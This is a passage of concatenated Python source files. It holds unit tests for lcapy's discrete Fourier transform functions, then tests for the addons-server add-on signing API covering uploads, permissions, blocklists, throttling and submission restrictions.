class LcapyTester(unittest.TestCase):
"""Unit tests for lcapy
"""
def test_DFT(self):
self.assertEqual(nexpr('delta(n)').DFT(), 1, "delta(n)")
self.assertEqual(nexpr('2 * delta(n)').DFT(), 2, "2 * delta(n)")
self.assertEqual(nexpr('1').DFT(), kexpr('N * delta(k)'), "1")
self.assertEqual(nexpr('2').DFT(), kexpr('2 * N * delta(k)'), "2")
self.assertEqual(nexpr('x(n)').DFT(), kexpr('X(k)'), "x(n)")
self.assertEqual(nexpr('2 * x(n)').DFT(), kexpr('2 * X(k)'), "2 * x(n)")
self.assertEqual(nexpr('x(2 * n)').DFT(), kexpr('X(k / 2) / 2'), "x(2 * n)")
self.assertEqual(nexpr('delta(n - 1)').DFT(),
kexpr('exp(-j * 2 * pi * k / N)'), "delta(n - 1)")
self.assertEqual(nexpr('2 * delta(n - 1)').DFT(),
kexpr('2 * exp(-j * 2 * pi * k / N)'), "2 * delta(n - 1)")
self.assertEqual(nexpr('delta(n - 2)').DFT(),
kexpr('exp(-j * 2 * pi * 2 * k / N)'), "delta(n - 2)")
# Temp. hack, ideally should get result 2 * N * delta(k + 1)
self.assertEqual(nexpr('2 * exp(-j * 2 * pi * n / N)').DFT(),
kexpr('2 * N * delta(k + 1 - N)'), "2 * exp(-j * 2 * pi * n / N)")
self.assertEqual(nexpr('x(n-1)').DFT(N=2),
kexpr('X(k)*exp(-j * pi * k)'), "x(n-1)")
def test_IDFT(self):
self.assertEqual(kexpr('X(k)').IDFT(), nexpr('x(n)'), "X(k)")
self.assertEqual(kexpr(1).IDFT(), delta(n), "1")
self.assertEqual(delta(k).IDFT(), nexpr('1 / N'), "delta(k)")
def test_DFT_matrix(self):
X1 = DFTmatrix(4)
X2 = Matrix(((1, 1, 1, 1), (1, -j, -1, j), (1, -1, 1, -1), (1, j, -1, -j)))
X3 = IDFTmatrix(4).conj * 4
self.assertEqual(X1, X2, "DFTmatrix(4)")
self.assertEqual(X3, X2, "IDFTmatrix(4)")
| mph-/lcapy | lcapy/tests/test_dft.py | Python | lgpl-2.1 | 1,983 |
import json
import os
from datetime import datetime, timedelta
from unittest import mock
from django.conf import settings
from django.forms import ValidationError
from django.test.testcases import TransactionTestCase
from django.test.utils import override_settings
from django.urls import reverse
from django.utils import translation
import responses
from freezegun import freeze_time
from olympia import amo
from olympia.access.models import Group, GroupUser
from olympia.activity.models import ActivityLog
from olympia.addons.models import Addon, AddonUser
from olympia.amo.templatetags.jinja_helpers import absolutify
from olympia.amo.tests import (
TestCase,
addon_factory,
create_default_webext_appversion,
developer_factory,
get_random_ip,
reverse_ns,
user_factory,
)
from olympia.api.tests.utils import APIKeyAuthTestMixin
from olympia.blocklist.models import Block
from olympia.files.models import File, FileUpload
from olympia.signing.views import VersionView
from olympia.users.models import (
EmailUserRestriction,
IPNetworkUserRestriction,
UserProfile,
UserRestrictionHistory,
)
from olympia.versions.models import Version
from rest_framework.response import Response
class SigningAPITestMixin(APIKeyAuthTestMixin):
def setUp(self):
self.user = developer_factory(
email='[email protected]', read_dev_agreement=datetime.now()
)
self.api_key = self.create_api_key(self.user, str(self.user.pk) + ':f')
class BaseUploadVersionTestMixin(SigningAPITestMixin):
@classmethod
def setUpTestData(cls):
create_default_webext_appversion()
def setUp(self):
super().setUp()
self.guid = '{2fa4ed95-0317-4c6a-a74c-5f3e3912c1f9}'
addon_factory(
guid=self.guid,
version_kw={'version': '2.1.072'},
users=[self.user],
)
self.view_class = VersionView
def url(self, guid, version, pk=None):
if guid is None:
args = [version]
else:
args = [guid, version]
if pk is not None:
args.append(pk)
return reverse_ns('signing.version', args=args)
def create_version(self, version):
response = self.request('PUT', self.url(self.guid, version), version)
assert response.status_code in [201, 202]
def xpi_filepath(self, guid, version):
return os.path.join(
'src',
'olympia',
'signing',
'fixtures',
f'{guid}-{version}.xpi',
)
def request(
self,
method='PUT',
url=None,
version='3.0',
guid='@upload-version',
filename=None,
channel=None,
extra_kwargs=None,
):
if filename is None:
filename = self.xpi_filepath(guid, version)
if url is None:
url = self.url(guid, version)
with open(filename, 'rb') as upload:
data = {'upload': upload}
if method == 'POST' and version:
data['version'] = version
if channel:
data['channel'] = channel
return getattr(self.client, method.lower())(
url,
data,
HTTP_AUTHORIZATION=self.authorization(),
format='multipart',
**(extra_kwargs or {}),
)
def make_admin(self, user):
admin_group = Group.objects.create(name='Admin', rules='*:*')
GroupUser.objects.create(group=admin_group, user=user)
class TestUploadVersion(BaseUploadVersionTestMixin, TestCase):
def test_not_authenticated(self):
# Use self.client.put so that we don't add the authorization header.
response = self.client.put(self.url(self.guid, '12.5'))
assert response.status_code == 401
def test_addon_does_not_exist(self):
guid = '@create-version'
qs = Addon.unfiltered.filter(guid=guid)
assert not qs.exists()
response = self.request('PUT', guid=guid, version='1.0')
assert response.status_code == 201
assert qs.exists()
addon = qs.get()
assert addon.guid == guid
assert addon.has_author(self.user)
assert addon.status == amo.STATUS_NULL
latest_version = addon.find_latest_version(channel=amo.RELEASE_CHANNEL_UNLISTED)
assert latest_version
assert latest_version.channel == amo.RELEASE_CHANNEL_UNLISTED
assert (
ActivityLog.objects.for_addons(addon)
.filter(action=amo.LOG.CREATE_ADDON.id)
.count()
== 1
)
def test_new_addon_random_slug_unlisted_channel(self):
guid = '@create-webextension'
qs = Addon.unfiltered.filter(guid=guid)
assert not qs.exists()
response = self.request('PUT', guid=guid, version='1.0')
assert response.status_code == 201
assert qs.exists()
addon = qs.get()
assert len(addon.slug) == 20
assert 'create' not in addon.slug
def test_user_does_not_own_addon(self):
self.user = UserProfile.objects.create(
read_dev_agreement=datetime.now(), email='[email protected]'
)
self.api_key = self.create_api_key(self.user, 'bar')
response = self.request('PUT', self.url(self.guid, '3.0'))
assert response.status_code == 403
assert response.data['error'] == 'You do not own this addon.'
def test_admin_does_not_own_addon(self):
self.user = UserProfile.objects.create(
read_dev_agreement=datetime.now(), email='[email protected]'
)
self.api_key = self.create_api_key(self.user, 'bar')
self.make_admin(self.user)
response = self.request('PUT', self.url(self.guid, '3.0'))
assert response.status_code == 403
assert response.data['error'] == 'You do not own this addon.'
def test_version_does_not_match_manifest_file(self):
response = self.request('PUT', self.url(self.guid, '2.5'))
assert response.status_code == 400
assert response.data['error'] == ('Version does not match the manifest file.')
def test_version_already_exists(self):
response = self.request(
'PUT', self.url(self.guid, '2.1.072'), version='2.1.072'
)
assert response.status_code == 409
assert response.data['error'] == (
'Version already exists. Latest version is: 2.1.072.'
)
@mock.patch('olympia.devhub.views.Version.from_upload')
def test_no_version_yet(self, from_upload):
response = self.request('PUT', self.url(self.guid, '3.0'))
assert response.status_code == 202
assert 'processed' in response.data
response = self.get(self.url(self.guid, '3.0'))
assert response.status_code == 200
assert 'processed' in response.data
def test_version_added(self):
assert Addon.objects.get(guid=self.guid).status == amo.STATUS_APPROVED
qs = Version.objects.filter(addon__guid=self.guid, version='3.0')
assert not qs.exists()
existing = Version.objects.filter(addon__guid=self.guid)
assert existing.count() == 1
assert existing[0].channel == amo.RELEASE_CHANNEL_LISTED
response = self.request(
'PUT', self.url(self.guid, '3.0'), extra_kwargs={'REMOTE_ADDR': '127.0.2.1'}
)
assert response.status_code == 202
assert 'processed' in response.data
upload = FileUpload.objects.latest('pk')
assert upload.source == amo.UPLOAD_SOURCE_SIGNING_API
assert upload.user == self.user
assert upload.ip_address == '127.0.2.1'
version = qs.get()
assert version.addon.guid == self.guid
assert version.version == '3.0'
assert version.file.status == amo.STATUS_AWAITING_REVIEW
assert version.addon.status == amo.STATUS_APPROVED
assert version.channel == amo.RELEASE_CHANNEL_LISTED
assert not version.file.is_mozilla_signed_extension
def test_version_already_uploaded(self):
response = self.request('PUT', self.url(self.guid, '3.0'))
assert response.status_code == 202
assert 'processed' in response.data
response = self.request('PUT', self.url(self.guid, '3.0'))
assert response.status_code == 409
assert response.data['error'] == (
'Version already exists. Latest version is: 3.0.'
)
def test_version_failed_review(self):
self.create_version('3.0')
version = Version.objects.get(addon__guid=self.guid, version='3.0')
version.update(reviewed=datetime.today())
version.file.update(reviewed=datetime.today(), status=amo.STATUS_DISABLED)
response = self.request('PUT', self.url(self.guid, '3.0'))
assert response.status_code == 409
assert response.data['error'] == (
'Version already exists. Latest version is: 3.0.'
)
# Verify that you can check the status after upload (#953).
response = self.get(self.url(self.guid, '3.0'))
assert response.status_code == 200
assert 'processed' in response.data
def test_version_added_is_experiment(self):
self.grant_permission(self.user, 'Experiments:submit')
guid = '@experiment-inside-webextension-guid'
qs = Addon.unfiltered.filter(guid=guid)
assert not qs.exists()
response = self.request(
'PUT',
guid=guid,
version='0.0.1',
filename='src/olympia/files/fixtures/files/'
'experiment_inside_webextension.xpi',
)
assert response.status_code == 201
assert qs.exists()
addon = qs.get()
assert addon.has_author(self.user)
assert addon.status == amo.STATUS_NULL
latest_version = addon.find_latest_version(channel=amo.RELEASE_CHANNEL_UNLISTED)
assert latest_version
assert latest_version.channel == amo.RELEASE_CHANNEL_UNLISTED
def test_version_added_is_experiment_reject_no_perm(self):
guid = '@experiment-inside-webextension-guid'
qs = Addon.unfiltered.filter(guid=guid)
assert not qs.exists()
response = self.request(
'PUT',
guid=guid,
version='0.1',
filename='src/olympia/files/fixtures/files/'
'experiment_inside_webextension.xpi',
)
assert response.status_code == 400
assert response.data['error'] == ('You cannot submit this type of add-on')
def test_mozilla_signed_allowed(self):
guid = '@webextension-guid'
self.grant_permission(self.user, 'SystemAddon:Submit')
qs = Addon.unfiltered.filter(guid=guid)
assert not qs.exists()
response = self.request(
'PUT',
guid=guid,
version='0.0.1',
filename='src/olympia/files/fixtures/files/'
'webextension_signed_already.xpi',
)
assert response.status_code == 201
assert qs.exists()
addon = qs.get()
assert addon.has_author(self.user)
assert addon.status == amo.STATUS_NULL
latest_version = addon.find_latest_version(channel=amo.RELEASE_CHANNEL_UNLISTED)
assert latest_version
assert latest_version.channel == amo.RELEASE_CHANNEL_UNLISTED
assert latest_version.file.is_mozilla_signed_extension
def test_mozilla_signed_not_allowed(self):
guid = '@webextension-guid'
qs = Addon.unfiltered.filter(guid=guid)
assert not qs.exists()
response = self.request(
'PUT',
guid=guid,
version='0.0.1',
filename='src/olympia/files/fixtures/files/'
'webextension_signed_already.xpi',
)
assert response.status_code == 400
assert response.data['error'] == (
'You cannot submit a Mozilla Signed Extension'
)
def test_restricted_guid_addon_allowed_because_signed_and_has_permission(self):
guid = '[email protected]'
self.grant_permission(self.user, 'SystemAddon:Submit')
qs = Addon.unfiltered.filter(guid=guid)
assert not qs.exists()
response = self.request(
'PUT',
guid=guid,
version='0.0.1',
filename='src/olympia/files/fixtures/files/mozilla_guid_signed.xpi',
)
assert response.status_code == 201
assert qs.exists()
addon = qs.get()
assert addon.has_author(self.user)
assert addon.status == amo.STATUS_NULL
latest_version = addon.find_latest_version(channel=amo.RELEASE_CHANNEL_UNLISTED)
assert latest_version
assert latest_version.channel == amo.RELEASE_CHANNEL_UNLISTED
def test_restricted_guid_addon_not_allowed_because_not_signed(self):
guid = '[email protected]'
self.grant_permission(self.user, 'SystemAddon:Submit')
qs = Addon.unfiltered.filter(guid=guid)
assert not qs.exists()
response = self.request(
'PUT',
guid=guid,
version='0.0.1',
filename='src/olympia/files/fixtures/files/mozilla_guid.xpi',
)
assert response.status_code == 400
assert response.data['error'] == (
'Add-ons using an ID ending with this suffix need to be signed with '
'privileged certificate before being submitted'
)
def test_restricted_guid_addon_not_allowed_because_lacking_permission(self):
guid = '[email protected]'
qs = Addon.unfiltered.filter(guid=guid)
assert not qs.exists()
response = self.request(
'PUT',
guid=guid,
version='0.1',
filename='src/olympia/files/fixtures/files/mozilla_guid.xpi',
)
assert response.status_code == 400
assert response.data['error'] == (
'You cannot submit an add-on using an ID ending with this suffix'
)
def test_restricted_guid_addon_update_allowed(self):
"""Updates to restricted IDs are allowed from anyone."""
guid = '[email protected]'
self.user.update(email='[email protected]')
orig_addon = addon_factory(
guid='[email protected]',
version_kw={'channel': amo.RELEASE_CHANNEL_UNLISTED},
)
AddonUser.objects.create(addon=orig_addon, user=self.user)
response = self.request(
'PUT',
guid=guid,
version='0.0.1',
filename='src/olympia/files/fixtures/files/mozilla_guid.xpi',
)
assert response.status_code == 202
addon = Addon.unfiltered.filter(guid=guid).get()
assert addon.versions.count() == 2
latest_version = addon.find_latest_version(channel=amo.RELEASE_CHANNEL_UNLISTED)
assert latest_version
assert latest_version.channel == amo.RELEASE_CHANNEL_UNLISTED
def test_invalid_version_response_code(self):
# This raises an error in parse_addon which is not covered by
# an exception handler.
response = self.request(
'PUT',
self.url(self.guid, '1.0'),
guid='@create-webextension-invalid-version',
version='1.0',
)
assert response.status_code == 400
def test_raises_response_code(self):
# A check that any bare error in handle_upload will return a 400.
with mock.patch('olympia.signing.views.devhub_handle_upload') as patch:
patch.side_effect = ValidationError(message='some error')
response = self.request('PUT', self.url(self.guid, '1.0'))
assert response.status_code == 400
def test_no_version_upload_for_admin_disabled_addon(self):
addon = Addon.objects.get(guid=self.guid)
addon.update(status=amo.STATUS_DISABLED)
response = self.request('PUT', self.url(self.guid, '3.0'), version='3.0')
assert response.status_code == 400
error_msg = 'cannot add versions to an addon that has status: %s.' % (
amo.STATUS_CHOICES_ADDON[amo.STATUS_DISABLED]
)
assert error_msg in response.data['error']
def test_no_listed_version_upload_for_user_disabled_addon(self):
addon = Addon.objects.get(guid=self.guid)
addon.update(disabled_by_user=True)
assert not addon.find_latest_version(channel=amo.RELEASE_CHANNEL_UNLISTED)
response = self.request('PUT', self.url(self.guid, '3.0'), version='3.0')
assert response.status_code == 400
error_msg = 'cannot add listed versions to an addon set to "Invisible"'
assert error_msg in response.data['error']
response = self.request(
'PUT', self.url(self.guid, '3.0'), version='3.0', channel='listed'
)
assert response.status_code == 400
assert error_msg in response.data['error']
response = self.request(
'PUT', self.url(self.guid, '3.0'), version='3.0', channel='unlisted'
)
assert response.status_code == 202
assert addon.find_latest_version(channel=amo.RELEASE_CHANNEL_UNLISTED)
def test_channel_ignored_for_new_addon(self):
guid = '@create-version'
qs = Addon.unfiltered.filter(guid=guid)
assert not qs.exists()
response = self.request('PUT', guid=guid, version='1.0', channel='listed')
assert response.status_code == 201
addon = qs.get()
assert addon.find_latest_version(channel=amo.RELEASE_CHANNEL_UNLISTED)
def test_no_channel_selects_last_channel(self):
addon = Addon.objects.get(guid=self.guid)
assert addon.status == amo.STATUS_APPROVED
assert addon.versions.count() == 1
assert addon.versions.all()[0].channel == amo.RELEASE_CHANNEL_LISTED
response = self.request('PUT', self.url(self.guid, '3.0'))
assert response.status_code == 202, response.data['error']
assert 'processed' in response.data
new_version = addon.versions.latest()
assert new_version.channel == amo.RELEASE_CHANNEL_LISTED
new_version.update(channel=amo.RELEASE_CHANNEL_UNLISTED)
response = self.request(
'PUT', self.url(self.guid, '4.0-beta1'), version='4.0-beta1'
)
assert response.status_code == 202, response.data['error']
assert 'processed' in response.data
third_version = addon.versions.latest()
assert third_version.channel == amo.RELEASE_CHANNEL_UNLISTED
def test_unlisted_channel_for_listed_addon(self):
addon = Addon.objects.get(guid=self.guid)
assert addon.status == amo.STATUS_APPROVED
assert addon.versions.count() == 1
assert addon.versions.all()[0].channel == amo.RELEASE_CHANNEL_LISTED
response = self.request('PUT', self.url(self.guid, '3.0'), channel='unlisted')
assert response.status_code == 202, response.data['error']
assert 'processed' in response.data
assert addon.versions.latest().channel == amo.RELEASE_CHANNEL_UNLISTED
def test_listed_channel_for_complete_listed_addon(self):
addon = Addon.objects.get(guid=self.guid)
assert addon.status == amo.STATUS_APPROVED
assert addon.versions.count() == 1
assert addon.has_complete_metadata()
response = self.request('PUT', self.url(self.guid, '3.0'), channel='listed')
assert response.status_code == 202, response.data['error']
assert 'processed' in response.data
assert addon.versions.latest().channel == amo.RELEASE_CHANNEL_LISTED
def test_listed_channel_fails_for_incomplete_addon(self):
addon = Addon.objects.get(guid=self.guid)
assert addon.status == amo.STATUS_APPROVED
assert addon.versions.count() == 1
addon.current_version.update(license=None) # Make addon incomplete.
addon.versions.latest().update(channel=amo.RELEASE_CHANNEL_UNLISTED)
assert not addon.has_complete_metadata(has_listed_versions=True)
response = self.request('PUT', self.url(self.guid, '3.0'), channel='listed')
assert response.status_code == 400
error_msg = 'You cannot add a listed version to this addon via the API'
assert error_msg in response.data['error']
def test_invalid_guid_in_package_post(self):
Addon.objects.all().delete()
response = self.request(
'POST',
url=reverse_ns('signing.version'),
version='1.0',
filename='src/olympia/files/fixtures/files/invalid_guid.xpi',
)
assert response.status_code == 400
assert response.data == {'error': 'Invalid Add-on ID in URL or package'}
assert not Addon.unfiltered.filter(guid='this_guid_is_invalid').exists()
assert not Addon.objects.exists()
def _test_throttling_verb_ip_burst(self, verb, url, expected_status=201):
# Bulk-create a bunch of users we'll need to make sure the user is
# different every time, so that we test IP throttling specifically.
users = [
UserProfile(username='bûlk%d' % i, email='bulk%[email protected]' % i)
for i in range(0, 6)
]
UserProfile.objects.bulk_create(users)
users = UserProfile.objects.filter(email__startswith='bulk')
with freeze_time('2019-04-08 15:16:23.42') as frozen_time:
for user in users:
self._add_fake_throttling_action(
view_class=self.view_class,
url=url,
user=user,
remote_addr='63.245.208.194',
)
# At this point we should be throttled since we're using the same
# IP. (we're still inside the frozen time context).
response = self.request(
verb,
url=url,
guid='@create-webextension',
version='1.0',
extra_kwargs={
'REMOTE_ADDR': '63.245.208.194',
'HTTP_X_FORWARDED_FOR': f'63.245.208.194, {get_random_ip()}',
},
)
assert response.status_code == 429, response.content
# 'Burst' throttling is 1 minute, so 61 seconds later we should be
# allowed again.
frozen_time.tick(delta=timedelta(seconds=61))
response = self.request(
verb,
url=url,
guid='@create-webextension',
version='1.0',
extra_kwargs={
'REMOTE_ADDR': '63.245.208.194',
'HTTP_X_FORWARDED_FOR': f'63.245.208.194, {get_random_ip()}',
},
)
assert response.status_code == expected_status
def _test_throttling_verb_ip_hourly(self, verb, url, expected_status=201):
# Bulk-create a bunch of users we'll need to make sure the user is
# different every time, so that we test IP throttling specifically.
users = [
UserProfile(username='bûlk%d' % i, email='bulk%[email protected]' % i)
for i in range(0, 50)
]
UserProfile.objects.bulk_create(users)
users = UserProfile.objects.filter(email__startswith='bulk')
with freeze_time('2019-04-08 15:16:23.42') as frozen_time:
for user in users:
# Make the user different every time so that we test the ip
# throttling.
self._add_fake_throttling_action(
view_class=self.view_class,
url=url,
user=user,
remote_addr='63.245.208.194',
)
# At this point we should be throttled since we're using the same
# IP. (we're still inside the frozen time context).
response = self.request(
verb,
url=url,
guid='@create-webextension',
version='1.0',
extra_kwargs={
'REMOTE_ADDR': '63.245.208.194',
'HTTP_X_FORWARDED_FOR': f'63.245.208.194, {get_random_ip()}',
},
)
assert response.status_code == 429
# One minute later, past the 'burst' throttling period, we're still
# blocked by the 'hourly' limit.
frozen_time.tick(delta=timedelta(seconds=61))
response = self.request(
verb,
url=url,
guid='@create-webextension',
version='1.0',
extra_kwargs={
'REMOTE_ADDR': '63.245.208.194',
'HTTP_X_FORWARDED_FOR': f'63.245.208.194, {get_random_ip()}',
},
)
assert response.status_code == 429
# 'hourly' throttling is 1 hour, so 3601 seconds later we should
# be allowed again.
frozen_time.tick(delta=timedelta(seconds=3601))
response = self.request(
verb,
url=url,
guid='@create-webextension',
version='1.0',
extra_kwargs={
'REMOTE_ADDR': '63.245.208.194',
'HTTP_X_FORWARDED_FOR': f'63.245.208.194, {get_random_ip()}',
},
)
assert response.status_code == expected_status
def _test_throttling_verb_user_burst(self, verb, url, expected_status=201):
with freeze_time('2019-04-08 15:16:23.42') as frozen_time:
for x in range(0, 6):
# Make the IP different every time so that we test the user
# throttling.
self._add_fake_throttling_action(
view_class=self.view_class,
url=url,
user=self.user,
remote_addr=get_random_ip(),
)
# At this point we should be throttled since we're using the same
# user. (we're still inside the frozen time context).
response = self.request(
verb,
url=url,
guid='@create-webextension',
version='1.0',
extra_kwargs={
'REMOTE_ADDR': get_random_ip(),
'HTTP_X_FORWARDED_FOR': f'{get_random_ip()}, {get_random_ip()}',
},
)
assert response.status_code == 429
# 'Burst' throttling is 1 minute, so 61 seconds later we should be
# allowed again.
frozen_time.tick(delta=timedelta(seconds=61))
response = self.request(
verb,
url=url,
guid='@create-webextension',
version='1.0',
extra_kwargs={
'REMOTE_ADDR': get_random_ip(),
'HTTP_X_FORWARDED_FOR': f'{get_random_ip()}, {get_random_ip()}',
},
)
assert response.status_code == expected_status
def _test_throttling_verb_user_hourly(self, verb, url, expected_status=201):
with freeze_time('2019-04-08 15:16:23.42') as frozen_time:
# 21 is above the hourly limit but below the daily one.
for x in range(0, 21):
# Make the IP different every time so that we test the user
# throttling.
self._add_fake_throttling_action(
view_class=self.view_class,
url=url,
user=self.user,
remote_addr=get_random_ip(),
)
# At this point we should be throttled since we're using the same
# user. (we're still inside the frozen time context).
response = self.request(
verb,
url=url,
guid='@create-webextension',
version='1.0',
extra_kwargs={
'REMOTE_ADDR': get_random_ip(),
'HTTP_X_FORWARDED_FOR': f'{get_random_ip()}, {get_random_ip()}',
},
)
assert response.status_code == 429
# One minute later, past the 'burst' throttling period, we're still
# blocked by the 'hourly' limit.
frozen_time.tick(delta=timedelta(seconds=61))
response = self.request(
verb,
url=url,
guid='@create-webextension',
version='1.0',
extra_kwargs={
'REMOTE_ADDR': get_random_ip(),
'HTTP_X_FORWARDED_FOR': f'{get_random_ip()}, {get_random_ip()}',
},
)
assert response.status_code == 429
# 3601 seconds later we should be allowed again.
frozen_time.tick(delta=timedelta(seconds=3601))
response = self.request(
verb,
url=url,
guid='@create-webextension',
version='1.0',
extra_kwargs={
'REMOTE_ADDR': get_random_ip(),
'HTTP_X_FORWARDED_FOR': f'{get_random_ip()}, {get_random_ip()}',
},
)
assert response.status_code == expected_status
def _test_throttling_verb_user_daily(self, verb, url, expected_status=201):
with freeze_time('2019-04-08 15:16:23.42') as frozen_time:
for x in range(0, 50):
# Make the IP different every time so that we test the user
# throttling.
self._add_fake_throttling_action(
view_class=self.view_class,
url=url,
user=self.user,
remote_addr=get_random_ip(),
)
# At this point we should be throttled since we're using the same
# user. (we're still inside the frozen time context).
response = self.request(
verb,
url=url,
guid='@create-webextension',
version='1.0',
extra_kwargs={
'REMOTE_ADDR': get_random_ip(),
'HTTP_X_FORWARDED_FOR': f'{get_random_ip()}, {get_random_ip()}',
},
)
assert response.status_code == 429
# One minute later, past the 'burst' throttling period, we're still
# blocked by the 'hourly' limit.
frozen_time.tick(delta=timedelta(seconds=61))
response = self.request(
verb,
url=url,
guid='@create-webextension',
version='1.0',
extra_kwargs={
'REMOTE_ADDR': get_random_ip(),
'HTTP_X_FORWARDED_FOR': f'{get_random_ip()}, {get_random_ip()}',
},
)
assert response.status_code == 429
# After the hourly limit, still blocked.
frozen_time.tick(delta=timedelta(seconds=3601))
response = self.request(
verb,
url=url,
guid='@create-webextension',
version='1.0',
extra_kwargs={
'REMOTE_ADDR': get_random_ip(),
'HTTP_X_FORWARDED_FOR': f'{get_random_ip()}, {get_random_ip()}',
},
)
assert response.status_code == 429
# 86401 seconds later we should be allowed again (24h + 1s).
frozen_time.tick(delta=timedelta(seconds=86401))
response = self.request(
verb,
url=url,
guid='@create-webextension',
version='1.0',
extra_kwargs={
'REMOTE_ADDR': get_random_ip(),
'HTTP_X_FORWARDED_FOR': f'{get_random_ip()}, {get_random_ip()}',
},
)
assert response.status_code == expected_status
def test_throttling_post_ip_burst(self):
url = reverse_ns('signing.version')
self._test_throttling_verb_ip_burst('POST', url)
def test_throttling_post_ip_hourly(self):
url = reverse_ns('signing.version')
self._test_throttling_verb_ip_hourly('POST', url)
def test_throttling_post_user_burst(self):
url = reverse_ns('signing.version')
self._test_throttling_verb_user_burst('POST', url)
def test_throttling_post_user_hourly(self):
url = reverse_ns('signing.version')
self._test_throttling_verb_user_hourly('POST', url)
def test_throttling_post_user_daily(self):
url = reverse_ns('signing.version')
self._test_throttling_verb_user_daily('POST', url)
def test_throttling_put_ip_burst(self):
url = self.url(self.guid, '1.0')
self._test_throttling_verb_ip_burst('PUT', url, expected_status=202)
def test_throttling_put_ip_hourly(self):
url = self.url(self.guid, '1.0')
self._test_throttling_verb_ip_hourly('PUT', url, expected_status=202)
def test_throttling_put_user_burst(self):
url = self.url(self.guid, '1.0')
self._test_throttling_verb_user_burst('PUT', url, expected_status=202)
def test_throttling_put_user_hourly(self):
url = self.url(self.guid, '1.0')
self._test_throttling_verb_user_hourly('PUT', url, expected_status=202)
def test_throttling_put_user_daily(self):
url = self.url(self.guid, '1.0')
self._test_throttling_verb_user_daily('PUT', url, expected_status=202)
def test_throttling_ignored_for_special_users(self):
self.grant_permission(self.user, ':'.join(amo.permissions.LANGPACK_SUBMIT))
url = self.url(self.guid, '1.0')
with freeze_time('2019-04-08 15:16:23.42'):
for x in range(0, 60):
# With that many actions all throttling classes should prevent
# the user from submitting an addon...
self._add_fake_throttling_action(
view_class=self.view_class,
url=url,
user=self.user,
remote_addr='1.2.3.4',
)
# ... But it works, because it's a special user allowed to bypass
# throttling.
response = self.request(
'PUT',
url=url,
guid='@create-webextension',
version='1.0',
extra_kwargs={
'REMOTE_ADDR': '1.2.3.4',
'HTTP_X_FORWARDED_FOR': f'1.2.3.4, {get_random_ip()}',
},
)
assert response.status_code == 202
def test_version_blocked(self):
block = Block.objects.create(
guid=self.guid, max_version='3.0', updated_by=user_factory()
)
response = self.request('PUT', self.url(self.guid, '3.0'))
assert response.status_code == 400
block_url = absolutify(reverse('blocklist.block', args=(self.guid,)))
assert response.data['error'] == (
f'Version 3.0 matches {block_url} for this add-on. '
'You can contact [email protected] for additional '
'information.'
)
# it's okay if it's outside of the blocked range though
block.update(max_version='2.9')
response = self.request('PUT', self.url(self.guid, '3.0'))
assert response.status_code == 202
def test_addon_blocked(self):
guid = '@create-webextension'
block = Block.objects.create(
guid=guid, max_version='3.0', updated_by=user_factory()
)
qs = Addon.unfiltered.filter(guid=guid)
assert not qs.exists()
# Testing when a new addon guid is specified in the url
response = self.request('PUT', guid=guid, version='1.0')
assert response.status_code == 400
block_url = absolutify(reverse('blocklist.block', args=(guid,)))
error_msg = (
f'Version 1.0 matches {block_url} for this add-on. '
'You can contact [email protected] for additional '
'information.'
)
assert response.data['error'] == error_msg
assert not qs.exists()
# it's okay if it's outside of the blocked range though
block.update(min_version='2.0')
response = self.request('PUT', guid=guid, version='1.0')
assert response.status_code == 201
def test_addon_blocked_guid_in_xpi(self):
guid = '@webextension-with-guid'
block = Block.objects.create(
guid=guid, max_version='3.0', updated_by=user_factory()
)
qs = Addon.unfiltered.filter(guid=guid)
assert not qs.exists()
filename = self.xpi_filepath('@create-webextension-with-guid', '1.0')
url = reverse_ns('signing.version')
response = self.request(
'POST', guid=guid, version='1.0', filename=filename, url=url
)
assert response.status_code == 400
block_url = absolutify(reverse('blocklist.block', args=(guid,)))
error_msg = (
f'Version 1.0 matches {block_url} for this add-on. '
'You can contact [email protected] for additional '
'information.'
)
assert response.data['error'] == error_msg
assert not qs.exists()
# it's okay if it's outside of the blocked range though
block.update(min_version='2.0')
response = self.request(
'POST', guid=guid, version='1.0', filename=filename, url=url
)
assert response.status_code == 201
class TestUploadVersionWebextension(BaseUploadVersionTestMixin, TestCase):
def test_addon_does_not_exist_webextension(self):
response = self.request(
'POST',
url=reverse_ns('signing.version'),
guid='@create-webextension',
version='1.0',
extra_kwargs={'REMOTE_ADDR': '127.0.3.1'},
)
assert response.status_code == 201
guid = response.data['guid']
addon = Addon.unfiltered.get(guid=guid)
assert addon.guid is not None
assert addon.guid != self.guid
upload = FileUpload.objects.latest('pk')
assert upload.version == '1.0'
assert upload.user == self.user
assert upload.source == amo.UPLOAD_SOURCE_SIGNING_API
assert upload.ip_address == '127.0.3.1'
assert addon.has_author(self.user)
assert addon.status == amo.STATUS_NULL
latest_version = addon.find_latest_version(channel=amo.RELEASE_CHANNEL_UNLISTED)
assert latest_version
assert latest_version.channel == amo.RELEASE_CHANNEL_UNLISTED
def test_post_addon_restricted(self):
Addon.objects.all().get().delete()
assert Addon.objects.count() == 0
EmailUserRestriction.objects.create(email_pattern=self.user.email)
response = self.request(
'POST',
url=reverse_ns('signing.version'),
guid='@create-webextension',
version='1.0',
)
assert response.status_code == 403
assert json.loads(response.content.decode('utf-8')) == {
'detail': 'The email address used for your account is not '
'allowed for add-on submission.'
}
EmailUserRestriction.objects.all().delete()
IPNetworkUserRestriction.objects.create(network='127.0.0.1/32')
response = self.request(
'POST',
url=reverse_ns('signing.version'),
guid='@create-webextension',
version='1.0',
)
assert response.status_code == 403
assert json.loads(response.content.decode('utf-8')) == {
'detail': 'Multiple add-ons violating our policies have been '
'submitted from your location. The IP address has been '
'blocked.'
}
assert Addon.objects.count() == 0
@override_settings(
REPUTATION_SERVICE_URL='https://reputation.example.com',
REPUTATION_SERVICE_TOKEN='atoken',
)
def test_post_addon_restricted_by_reputation_ip(self):
Addon.objects.all().get().delete()
assert Addon.objects.count() == 0
responses.add(
responses.GET,
'https://reputation.example.com/type/ip/127.0.0.1',
content_type='application/json',
json={'reputation': 45},
)
responses.add(
responses.GET,
'https://reputation.example.com/type/email/%s' % self.user.email,
content_type='application/json',
status=404,
)
response = self.request(
'POST',
url=reverse_ns('signing.version'),
guid='@create-webextension',
version='1.0',
)
assert response.status_code == 403
assert json.loads(response.content.decode('utf-8')) == {
'detail': 'Multiple add-ons violating our policies have been '
'submitted from your location. The IP address has been '
'blocked.'
}
assert len(responses.calls) == 2
assert Addon.objects.count() == 0
@override_settings(
REPUTATION_SERVICE_URL='https://reputation.example.com',
REPUTATION_SERVICE_TOKEN='some_token',
)
def test_post_addon_restricted_by_reputation_email(self):
Addon.objects.all().get().delete()
assert Addon.objects.count() == 0
responses.add(
responses.GET,
